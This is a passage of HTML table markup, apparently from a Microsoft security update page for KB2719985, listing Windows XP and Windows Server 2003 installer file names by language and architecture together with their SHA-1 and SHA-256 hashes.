class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-ia64-custom-JPN.exe</td><td class=\"sbody-td\">2FF9C3B858407D87C7A49754017344E052391EB8</td><td class=\"sbody-td\">6523982612206043071A0C268264AB903DCF9075150A4BAAC44C103677044667</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-ia64-DEU.exe</td><td class=\"sbody-td\">350F48B640A85CD0EDB1F66B0091211656486299</td><td class=\"sbody-td\">2EE9D7F6DB0571597DA3072745747DDBC88EBF26884620B914345204CB20A309</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-ia64-ENU.exe</td><td class=\"sbody-td\">3D22B40425C209137919D3DCF9A568BA1104D815</td><td class=\"sbody-td\">F995B5A42229453A18DD2E0381C971146C47039AEBA0053BD4FB9C3033F45F79</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-ia64-FRA.exe</td><td class=\"sbody-td\">3C045D9B2E2C4FF5A565BF68457D035D4CEED497</td><td class=\"sbody-td\">60D1BC44E353F7F693BE62049A408F15C66F4FDF7AB1BDD7686338A7A7F0053F</td></tr><tr class=\"sbody-tr\"><th class=\"sbody-th\">WindowsServer2003-KB2719985-ia64-JPN.exe</th><th class=\"sbody-th\">F2A1AAFD3DF861DC813D3AAD5070C11C308A3BED</th><th class=\"sbody-th\">E0EEE654D5312E6B16E0CBC82E7258B5BD6394A76A780F9B9B9B38F5B54C5D04</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-x86-CHS.exe</td><td class=\"sbody-td\">5DD46C0690DE420E3222AF130213D14F3D95D123</td><td class=\"sbody-td\">BF723759683A694581C2368D8F137B6614A1FFA95858A2D7D491B18B3D82F231</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-x86-CHT.exe</td><td class=\"sbody-td\">44EDE43AA22153EDFCA78C71A07C74937054870B</td><td class=\"sbody-td\">0EDBBDE907A6331635D55451002AD66703614243309467809DEFEE9D2332F00B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-x86-CSY.exe</td><td class=\"sbody-td\">DF3E9A1021E117209C642AC827601153665FCD9A</td><td class=\"sbody-td\">D98863BC2D8F2F90FAF47DBB27A8721581D2749FB610B1D1EC385091062F991F</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-x86-custom-CHS.exe</td><td class=\"sbody-td\">5C8BB92A3AAC4EF234B073953AFA6811C0D41950</td><td class=\"sbody-td\">C9D9D2635EBA294BDADB498EF209E565F7D556E20F5E1BD3CEA61F328CB7018C</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-x86-custom-CHT.exe</td><td class=\"sbody-td\">82D2CDD25D463463F35693B95F7CC7AE6A941345</td><td class=\"sbody-td\">0ECDCD02F1CCCCA12444C7D67A6754E5D0778339B3121696D1B7C67705C568C4</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-x86-custom-CSY.exe</td><td class=\"sbody-td\">A300D1EA6F8327BD4D91C52B62884451D9AB5633</td><td class=\"sbody-td\">86F8366E3E0016824E7F3632B297ACBD38318B977136D3B3F28DA2F6038F9054</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-x86-custom-DEU.exe</td><td class=\"sbody-td\">B87B0D0226C9B81FA8EAFE787A034DC76DFF2223</td><td class=\"sbody-td\">39E1D247D78289B7F4F30A79A4D541FA320D372ED4626A4AED7F0D84F13E77FB</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-x86-custom-ENU.exe</td><td class=\"sbody-td\">1EE47459FF72EDC43D34949EB28DD113FD405335</td><td class=\"sbody-td\">BA5B37BE5DD9F100B3BBA2202FF0BF9EE28191063ECBF90C90AAE14A95735276</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-x86-custom-ESN.exe</td><td class=\"sbody-td\">E5E2722B329F537E494C036E764B5F2A9D68B502</td><td class=\"sbody-td\">A3F749A53AF356B1BF973582CBFA73FD01B855AD6ADA368CF4905ED01F45E31B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-x86-custom-FRA.exe</td><td class=\"sbody-td\">3466B361CADFFB9B0DF408DA9FFACB77971BBFAD</td><td class=\"sbody-td\">86B386170B62C07F87B1F4750592AF327180FB11AE835B1FCB859DF777F21C41</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-x86-custom-HUN.exe</td><td class=\"sbody-td\">05D448FC9C59C85083855760AA8888A70F95FFCD</td><td class=\"sbody-td\">6F8E677FD9EE84A61E552CD61D8B2DBFAB183E74C01EBD89ADBE7ABE6850098A</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-x86-custom-ITA.exe</td><td class=\"sbody-td\">69ADAA91A1ED6FF61E9B214F9794BB1A89A5B741</td><td class=\"sbody-td\">BF4FF2624FFDC48E30316C0DA2A463740F0770B788384E78EAB17E377DDAD4B8</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-x86-custom-JPN.exe</td><td class=\"sbody-td\">0ED2B0DBB082379FB616BDE68BF259771C2AD466</td><td class=\"sbody-td\">DBAA57F0F6CAA029C60F46318DC8ACD11451995D850165FF35BF7D8716EE1CA5</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-x86-custom-KOR.exe</td><td class=\"sbody-td\">057EA47B6F5CF89ACF7C0C011D7168E3F4EE19C5</td><td class=\"sbody-td\">9593A1B0CD2177D19F4A7B1BF20C88809ACC2A8EAC18B23CB72FB45BBBB4305D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-x86-custom-NLD.exe</td><td class=\"sbody-td\">B36603B293868A7D856AC21093F6B90EAD0CE1E8</td><td class=\"sbody-td\">D54CE261733F2CA8959745E2A32DD5F67CA7115E6F7753968EE0EDF76688C446</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-x86-custom-PLK.exe</td><td class=\"sbody-td\">2FCB97B5E35AC7F116C3BF8852B3DCB8AFF8451A</td><td class=\"sbody-td\">B654862985C8CA533ECC261E38E70F4BB341DE94D57F2991E8D688D4290977AE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-x86-custom-PTB.exe</td><td class=\"sbody-td\">8F9712D413074A5DDEAC93ECB4C792DD2AADB68E</td><td class=\"sbody-td\">6DBE0AA551B6818A431163523D104125960113526AB80D0932586E7B2DD3815D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-x86-custom-PTG.exe</td><td class=\"sbody-td\">E881CF1B56316E5BCCA31240BADC7F947E587872</td><td class=\"sbody-td\">381CBF98EA2D9C4D01E7514766A257F2BE1240B307AAE793D381311E23AAA628</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-x86-custom-RUS.exe</td><td class=\"sbody-td\">E9B1F77A2016F4F8A13918B100118050CE44CE79</td><td class=\"sbody-td\">245D6A1F3E835677D614E754918D8AC54B4CA09519166D410199E6E450EDE19E</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-x86-custom-SVE.exe</td><td class=\"sbody-td\">78F7FC2D9BFBD2D14FC268785986409E19352B50</td><td class=\"sbody-td\">46221107D6B1F323936E1B3B83B03A695173366C9372CA8CD49B1C81DCE4016F</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-x86-custom-TRK.exe</td><td class=\"sbody-td\">6112650D5305472804DB784BDD9DA9EE0833A195</td><td class=\"sbody-td\">A0FD16DCD02D40C6A9E53F8EA1B4F64F5B83025F74A427CFDCDBC0B99ED14A14</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-x86-DEU.exe</td><td class=\"sbody-td\">8A65555A4F24CE5549CB13D5AEB23F900E412D91</td><td class=\"sbody-td\">EF11854ACF51CC937A5353144DA21BD7537327C360B33BBECC0023E9485F3758</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-x86-ENU.exe</td><td class=\"sbody-td\">D88236DCBBA74B1B29536E91555168D9DFE0B758</td><td class=\"sbody-td\">4CFAD60207D17EDC59DEAAEDB590A64529ECE3D2EEC92349317EADBADA487E95</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-x86-ESN.exe</td><td class=\"sbody-td\">D77625C93564561C6831FFA5AE6DA0F94442E1C8</td><td class=\"sbody-td\">FF4C997D187FF90AA0BACBDCB5660CE92FE096D64591A4137874211FDF85C800</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-x86-FRA.exe</td><td class=\"sbody-td\">3351B33E3F3571BD9D0A2A6223CA423390D6EA08</td><td class=\"sbody-td\">32E62B90C06DF92EFF317D79513B4F2752AEB4AEDFD892994F1F90912E69B2AF</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-x86-HUN.exe</td><td class=\"sbody-td\">93FAC5493563684C792CFB7AE2391E586CFE1382</td><td class=\"sbody-td\">37C1D9E6BA3DBB86BDE46FE71CF9EC6CB417717EB3C1A51BD7C07E894DDF7E4C</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-x86-ITA.exe</td><td class=\"sbody-td\">E95CA61A177E5FFAD385AB7AB93F97002E2E36A0</td><td class=\"sbody-td\">386C6CF352DE4CAC706AEF1FF11632D13CFED0BD0597DC481DE4F6F09C124266</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-x86-JPN.exe</td><td class=\"sbody-td\">368FE9F6FC07A4937B6276838BD618D21AC80FBF</td><td class=\"sbody-td\">7157E37C18D014CE73FCA58BAB9193335B93FA7621F21619949C37357DDFB1C1</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-x86-KOR.exe</td><td class=\"sbody-td\">D45585AD57395AB19F01FA801935074BA1246916</td><td class=\"sbody-td\">88B6827D3FFAA1F99FE4D92C04E4E017D1D810132C4B525705EE87F457907FAD</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-x86-NLD.exe</td><td class=\"sbody-td\">05F3433C27D866F38467B49C6A6E2D3A97216329</td><td class=\"sbody-td\">536CD7ACE59C75C12054ED787E59145E3C44A97F0A592AD2A47D792A21F1CDC2</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-x86-PLK.exe</td><td class=\"sbody-td\">0730AAD1D5006DCBDE07A1159EF5D01309B59FAD</td><td class=\"sbody-td\">6FAF69C952FFCF447249B75A5F3F1B974BA85F691212FB287DE36CD1FC30EECC</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-x86-PTB.exe</td><td class=\"sbody-td\">E21ABC4E53F1725553DB4DF646F46BCF76368F7E</td><td class=\"sbody-td\">37342D2749A4B32AF9CA53FEF59B37316CA2B88F91FDF500967C691C8F36BFDD</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-x86-PTG.exe</td><td class=\"sbody-td\">F6346605283009F16530D983ED6A76AB4A576608</td><td class=\"sbody-td\">3DD61CFE40553B9FBD23D3D9BCC204739DD07F045FD309CA04B17BE93CB992EF</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-x86-RUS.exe</td><td class=\"sbody-td\">9D501B805F8A82BDE54AE0128A5AF7189798D201</td><td class=\"sbody-td\">65F7FEBD670F2CCA3AF95F194CA2ABC2C902DDEF6E070754D54FA1291D78B60B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-x86-SVE.exe</td><td class=\"sbody-td\">BEA86821A2D887FE8B991A8F114832DAF6D3E662</td><td class=\"sbody-td\">31095CC7F1590DB92DDDD6012F41C23BB97C0E36F75BF2875AD322241D634CE4</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003-KB2719985-x86-TRK.exe</td><td class=\"sbody-td\">85D56B625AA35286B50242B3261C79A11E0B923A</td><td class=\"sbody-td\">95A4E8459E28452739C2EDB699CE55107CF428F4B5999EDB3896577806016BE4</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003.WindowsXP-KB2719985-x64-CHS.exe</td><td class=\"sbody-td\">5F625BA0253958D3866C712EED1666D6F1961FC7</td><td class=\"sbody-td\">A6B5ABEFFA756ABFDB36CAF7612A5F7259D5859CF1E58ECA5558911485A89DEF</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003.WindowsXP-KB2719985-x64-CHT.exe</td><td class=\"sbody-td\">4BCB663C0E4BBF37EB4F65AF83854AB73F1D3ADA</td><td class=\"sbody-td\">77C19A15245DE75E65338DF85FBF2ED46BC5B53D489AAAB096CC9C51BE77D9B7</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003.WindowsXP-KB2719985-x64-custom-ENU.exe</td><td class=\"sbody-td\">75B5A82DF6CC1980B87DDC0D1556416FC524EE08</td><td class=\"sbody-td\">9D96EF7525A6E3CBAA6286D10E08D7E2931AE2E90B2A04E2D243DE3F4653AFB5</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003.WindowsXP-KB2719985-x64-custom-JPN.exe</td><td class=\"sbody-td\">08EE91E865BA140893BB5125A3BA9EDD14446942</td><td class=\"sbody-td\">E7453CB1168FED6A2CB93770D40802BCB73671035E7C4658BF58C3B80793CBC4</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003.WindowsXP-KB2719985-x64-DEU.exe</td><td class=\"sbody-td\">E2B3FE9C56B3DCA7CD47F5D3FD1F98640152FCC7</td><td class=\"sbody-td\">675631240A1C82CE54D2AD6C7494BBE6E46CCF6ACB0F6390392786E09FCDA9E0</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003.WindowsXP-KB2719985-x64-ENU.exe</td><td class=\"sbody-td\">3F3A5B2ADFBD55BABF416E982947CCCE24644787</td><td class=\"sbody-td\">608FEFD4EE01DA5741AFACE12D5BC2EB5A00D96A2486584E8D7E08B8649084CC</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003.WindowsXP-KB2719985-x64-ESN.exe</td><td class=\"sbody-td\">8794A1E1FCB6E59F6352D38F217D74EBBED44C9F</td><td class=\"sbody-td\">BDC0A6FD84549091BEFBA0B5528E5F3305BD1051E4548B2DAF7705E1667F9853</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003.WindowsXP-KB2719985-x64-FRA.exe</td><td class=\"sbody-td\">4B35C78DEB7AAD967CB5877DB7EEC120CF2A5890</td><td class=\"sbody-td\">131ED91B72E65D09392278783354515833E8E4B75441824E1CEB474C97CC927F</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003.WindowsXP-KB2719985-x64-ITA.exe</td><td class=\"sbody-td\">532A8F50879721BBFED0F1370C50E05B9EEED6A2</td><td class=\"sbody-td\">EBE29B3A89F0F3C3E4201EB67C4B1174884FE7A3A78982CF31D570B577FA4602</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003.WindowsXP-KB2719985-x64-JPN.exe</td><td class=\"sbody-td\">E19C0902BD39ADE6292AEA4613FCF301589E537D</td><td class=\"sbody-td\">A13A9385DA62CA79DC11B62EBBC73B3D531366DBA1564267974CF61CF120D214</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003.WindowsXP-KB2719985-x64-KOR.exe</td><td class=\"sbody-td\">BCA29A6A41A2E1EAD63655C97ACD5EDF79B4E67A</td><td class=\"sbody-td\">6C205BF39307266B87859D86360B781F9958F39D5968A9DEC44861F4BD69704F</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003.WindowsXP-KB2719985-x64-PTB.exe</td><td class=\"sbody-td\">359B5BB3E54ED1C5F527EAA04CBAFFFEB6DA3EC2</td><td class=\"sbody-td\">4CCFA968D223180F3424758C5BA504E26150660E5899B1E335B17A6AC90F4E4A</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsServer2003.WindowsXP-KB2719985-x64-RUS.exe</td><td class=\"sbody-td\">9866A93AB2693CB5C7C177B6E0D53EA3B90596A6</td><td class=\"sbody-td\">3975112E6619A5AACF5D6AC6980D37BE3EE308F8AEFB35E06E285AF5929FB1B5</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2719985-x86-ARA.exe</td><td class=\"sbody-td\">7AC52DAB095B058F0AB98C2B2748833AAAB0522F</td><td class=\"sbody-td\">08EA137B3C355CA52A3FD9003C37E1891030774610C9237F12ACDA62C3990E4B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2719985-x86-CHS.exe</td><td class=\"sbody-td\">456BD93878AAB89299AE4FFD38C213A43FB21EAE</td><td class=\"sbody-td\">AAC14B693453149D60619A864F8791914830DE97498030951296D2E8E4C7E468</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2719985-x86-CHT.exe</td><td class=\"sbody-td\">B16FF1E3071D7D671437915819BB0F2CB3BBE18D</td><td class=\"sbody-td\">344F5A565F8577F957DA5DE65C748504E7498F345D5ADDCD8A3720C836E22E05</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2719985-x86-CSY.exe</td><td class=\"sbody-td\">BB7141F64C0339E919228B43AB46A55850B2529A</td><td class=\"sbody-td\">512643E2C41C81CD8BD0865A7C4042266B45A7B8D7E207D2F0DB5574FBF634EF</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2719985-x86-custom-ARA.exe</td><td class=\"sbody-td\">00B6DECD550E218BEAD163F51C4AC6EFDEAD2030</td><td class=\"sbody-td\">D056D7AD27BC71478FB6E4065A1D57E93516CE35A6DDBD92276C3A047C7ACB84</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2719985-x86-custom-CHS.exe</td><td class=\"sbody-td\">8A5A69BCD686E6053B1D67FC27B260767F6664EA</td><td class=\"sbody-td\">FD224DC22FFF4FFC0767556F7B3BCDF850BB85A420667FE06FBE8E6A6BCF8E27</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2719985-x86-custom-CHT.exe</td><td class=\"sbody-td\">85689414483EA2594A1C397DF0B13D773C5265D8</td><td class=\"sbody-td\">CF8F6EC558D68334D385DAD263661E526951D4FE300B79E37BD368A9F443CB04</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2719985-x86-custom-CSY.exe</td><td class=\"sbody-td\">78B8E139AFF9166AA504671BF14AEC268DE58AB6</td><td class=\"sbody-td\">FD43BFD3FC5F7C5A6118A5646E4D0D49AEE12889666F9C623CA205C86C123B0D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2719985-x86-custom-DAN.exe</td><td class=\"sbody-td\">9B027BBF8BECBC4C300840B687C5EB645809D06E</td><td class=\"sbody-td\">9E84C00208C816BD0189CC4FEA2FE8A7BDE776C47A1EA513D7DA9821858821F0</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2719985-x86-custom-DEU.exe</td><td class=\"sbody-td\">81706A6563E51ED36786BCE3422534428E0B2EF3</td><td class=\"sbody-td\">13713E036ECA9F81AE43B68842E7180E407B24CB112CC786EAF684808D4A6599</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2719985-x86-custom-ELL.exe</td><td class=\"sbody-td\">7FAFCE2571B396851BAAEA1CD0C659F0E2812732</td><td class=\"sbody-td\">0BC00CA650C90B0D4F8A2F4A7A1D0B330FF5AC4AD31E8982CD53D6A0B3740A5C</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2719985-x86-custom-ENU.exe</td><td class=\"sbody-td\">3A51BF9ABD934E7A8F013B6623FB452597533BC0</td><td class=\"sbody-td\">E70EA4687EBBF2C54D0573F6B193F9E909CE3F9D205E34911B84C0052A6E5980</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2719985-x86-custom-ESN.exe</td><td class=\"sbody-td\">877948A7365467EC04A3F96DBE528B7BCF176552</td><td class=\"sbody-td\">C69E753F6C9AD077EA156B07AECACFD723FD4F3EDA1D93BF7288CF990EBB45CE</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2719985-x86-custom-FIN.exe</td><td class=\"sbody-td\">80182A4F411A0833FA1238AA82D1BC347ED93E88</td><td class=\"sbody-td\">FBB887185E3FFC5AED75A84A62F521947D2592AA18FBD270AD4E00282CF44B64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2719985-x86-custom-FRA.exe</td><td class=\"sbody-td\">D2D14D2E74282B87DBD35ADF720A96B81569646E</td><td class=\"sbody-td\">5F5838D348444C2B4979FBE5F709AED6A1A200C5FD0606F6C4F117E2DEFD5C09</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2719985-x86-custom-HEB.exe</td><td class=\"sbody-td\">641C51EB9FC30C8125F1E6EBD14C808ED7D50AD7</td><td class=\"sbody-td\">E16A7378369D9AE938011BBACE2A39918C11D532C6EA2D44385ECD319223F1FC</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2719985-x86-custom-HUN.exe</td><td class=\"sbody-td\">645A3F7BD1A9FDCBC8E0089880223EFC8C4D3528</td><td class=\"sbody-td\">53C823793B27990F5FBFAD1798F8C985EA4BA57216353DF3E591EF66BF58366D</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2719985-x86-custom-ITA.exe</td><td class=\"sbody-td\">86A314536AC040CF06B511663D19E46BE7730F1C</td><td class=\"sbody-td\">46F3E12F2DFBD2CA213AA88628702339E7FFC4CA23D0DF1FAF236F254306CC90</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2719985-x86-custom-JPN.exe</td><td class=\"sbody-td\">ED01F878C3B8E5F8B3E9D0FD5411D1319866268B</td><td class=\"sbody-td\">3D0B43C2EB87520528655F4FDF7125975D9102F95536E32EA3F9B2C7017A8B7C</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2719985-x86-custom-KOR.exe</td><td class=\"sbody-td\">B4009416AB0387A4AEC682BFC516D442BAA72C84</td><td class=\"sbody-td\">37EA2D45C78EC2F22D046836B890082437F64775E87D3B1653A620D5482C29F8</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2719985-x86-custom-NLD.exe</td><td class=\"sbody-td\">EF511B1AEB3C513443F6F053F27B0C922AC4685A</td><td class=\"sbody-td\">58A900EB2440A8816E2685DCBA3749B1F90907FF39E50CB4FBE06F87FA1A393F</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2719985-x86-custom-NOR.exe</td><td class=\"sbody-td\">1D2C6F17CFEBC046DDB4FBD9ADFDA94D1E561CED</td><td class=\"sbody-td\">6E7B898E1155841BB5D1F43F11DE2966CEA76B7792696A48C0A0B2FD07F32000</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2719985-x86-custom-PLK.exe</td><td class=\"sbody-td\">5AE89AF747AAED91A56068828EB8B729EE046638</td><td class=\"sbody-td\">B22FE696ADD4DACE0DD4247BF2E0E9C8918A0ABA784860110598CA4D0AF3CED3</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2719985-x86-custom-PTB.exe</td><td class=\"sbody-td\">BA6ABB49FEA52D07D6D165A62386F8C7B41CA7F2</td><td class=\"sbody-td\">DA8A2DD5CAB8767283D3084FE5ECC3032755852326F7F8B943BA3FF6E9823FDF</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2719985-x86-custom-PTG.exe</td><td class=\"sbody-td\">6FE618B11C54C98B59B834B3687F5F768D26BB61</td><td class=\"sbody-td\">114E13F051C88966632801D10816FD7942B8FBFF7B8968E6B4546DFCABE2E9BC</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2719985-x86-custom-RUS.exe</td><td class=\"sbody-td\">0E62EF0E66A5D7D0F4C8C889FB8C2F9C8D76318A</td><td class=\"sbody-td\">44781C91A119F6792921D776DC1D11E9AA9ED2550297F5BB1DFD00400DDE8A98</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2719985-x86-custom-SVE.exe</td><td class=\"sbody-td\">1220F407A53DC7FDCADD190A33383E43E93EE54A</td><td class=\"sbody-td\">84C317F44FD3D587BA143312250FF2FFB84BBC64CFE415A716269A6C78EA7EEF</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2719985-x86-custom-TRK.exe</td><td class=\"sbody-td\">62B0DE558FECD838E4A4047A5E00FB055ED0413E</td><td class=\"sbody-td\">78EA3B94538993C5087F4C83240807E62D45F24959198289C6F1571BE6D69663</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2719985-x86-DAN.exe</td><td class=\"sbody-td\">E4385FA7452D0B857B40002350A0EC596976B93E</td><td class=\"sbody-td\">7716776708CF14DF80B54ECCF6BDC46CAABBA8CC2112E66AB245B9F37910C3E5</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2719985-x86-DEU.exe</td><td class=\"sbody-td\">89CFB585D9BAE95458688C7C60CB7883B2CE2D02</td><td class=\"sbody-td\">A291C84AE02B3A66B7772CF20ED011A370C31BCC2D81CB6C89B47942F10BF94E</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2719985-x86-ELL.exe</td><td class=\"sbody-td\">ABBBBD89A3BF6CA31D923B19B8697A0FE4A937BB</td><td class=\"sbody-td\">EE3F1E6763D5504C0080764FA36C080282648319B1732538F1BBAFA409847C4F</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2719985-x86-ENU.exe</td><td class=\"sbody-td\">D33EA68905D7228777D96BA64656B26CB9AEE5A2</td><td class=\"sbody-td\">94F67A28D3FEA83E415BAB7E52141DE9E5A044CF2E6B6FA6A8820FEE254169CC</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2719985-x86-ESN.exe</td><td class=\"sbody-td\">ADA16A8CE7D7A643B099F3B979DEE163D594A92D</td><td class=\"sbody-td\">8F6F4AAE5F162F8F102E8EB9345577A413AFE38E07BF0D349EAF0BB63B22C2A7</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2719985-x86-FIN.exe</td><td class=\"sbody-td\">F5A051535C92A0E074F16BD6B5D65058D3820ECB</td><td class=\"sbody-td\">AC6C07370BEF34049D3D5C507943C0861E98188E22B478561E0926FEBBA9CCD8</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2719985-x86-FRA.exe</td><td class=\"sbody-td\">5C3E607A2D401EE2563CE12E53E91326E54DC2A4</td><td class=\"sbody-td\">E9EEB2529EBA97BFD9C8DC5F1426217A2E1745EDBAC26A60079E22BE4FA1F852</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2719985-x86-HEB.exe</td><td class=\"sbody-td\">5537BED6178E6F79AED481DE0D2512B257BAF8C4</td><td class=\"sbody-td\">2B41D55F571AA84A3586A475796EA66768E9B09143F7003AE67E3C3D9579FBDB</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2719985-x86-HUN.exe</td><td class=\"sbody-td\">F2DA04B3495FC5E0326F8FDBA32715A2029FB54C</td><td class=\"sbody-td\">8A064D26368EC93EA33B3E11A2F5BDC838D1913CFA39498792EA52072D9458B8</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2719985-x86-ITA.exe</td><td class=\"sbody-td\">1760BF5AB883EAB5F0549352A51E6C43C4AA9577</td><td class=\"sbody-td\">56F6009C095717ADE6FAC4A32422DC206FCF37BFD71728AF4363D780E7C0034B</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2719985-x86-JPN.exe</td><td class=\"sbody-td\">9CF4FBBD30024F898E18B891D2D2E1DCF005277C</td><td class=\"sbody-td\">AA44395FB34FB73DC217B2EA708AAD8CD3ABF1431574F2BF7E7B10B65B82F061</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2719985-x86-KOR.exe</td><td class=\"sbody-td\">E8F998BFBD3A74B81955DE75809E75A8C8CEA759</td><td class=\"sbody-td\">A83488727710EF07E876520EC8B2BD6C231E58036C01D9B202515159A3322D4F</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">WindowsXP-KB2719985-x86-NLD.exe</td><td 